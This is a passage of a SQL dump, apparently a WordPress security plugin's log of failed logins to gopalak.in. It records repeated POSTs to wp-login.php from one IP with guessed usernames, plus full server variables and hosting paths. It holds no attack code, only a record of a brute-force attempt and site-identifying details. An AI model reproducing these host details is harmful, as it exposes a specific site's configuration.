4:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829596.408561;s:12:\"REQUEST_TIME\";i:1746829596;}}','13.201.84.118',1,'2025-05-10 03:56:38','2025-05-11 04:14:48'),(95159,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829596.4116681;s:12:\"REQUEST_TIME\";i:1746829596;}}','13.201.84.118',1,'2025-05-10 03:56:38','2025-05-11 04:14:47'),(95160,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829869.5731561;s:12:\"REQUEST_TIME\";i:1746829869;}}','13.201.84.118',1,'2025-05-10 04:01:11','2025-05-11 04:14:47'),(95161,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829869.589313;s:12:\"REQUEST_TIME\";i:1746829869;}}','13.201.84.118',1,'2025-05-10 04:01:11','2025-05-11 04:14:47'),(95162,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829869.5746081;s:12:\"REQUEST_TIME\";i:1746829869;}}','13.201.84.118',1,'2025-05-10 04:01:11','2025-05-11 04:14:47'),(95163,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829869.580241;s:12:\"REQUEST_TIME\";i:1746829869;}}','13.201.84.118',1,'2025-05-10 04:01:11','2025-05-11 04:14:48'),(95164,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829871.2870071;s:12:\"REQUEST_TIME\";i:1746829871;}}','13.201.84.118',1,'2025-05-10 04:01:12','2025-05-11 04:14:48'),(95165,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830139.2257431;s:12:\"REQUEST_TIME\";i:1746830139;}}','13.201.84.118',1,'2025-05-10 04:05:41','2025-05-11 04:14:47'),(95166,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830139.226984;s:12:\"REQUEST_TIME\";i:1746830139;}}','13.201.84.118',1,'2025-05-10 04:05:41','2025-05-11 04:14:47'),(95167,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830139.226233;s:12:\"REQUEST_TIME\";i:1746830139;}}','13.201.84.118',1,'2025-05-10 04:05:41','2025-05-11 04:14:48'),(95168,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830139.2402151;s:12:\"REQUEST_TIME\";i:1746830139;}}','13.201.84.118',1,'2025-05-10 04:05:41','2025-05-11 04:14:48'),(95169,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\"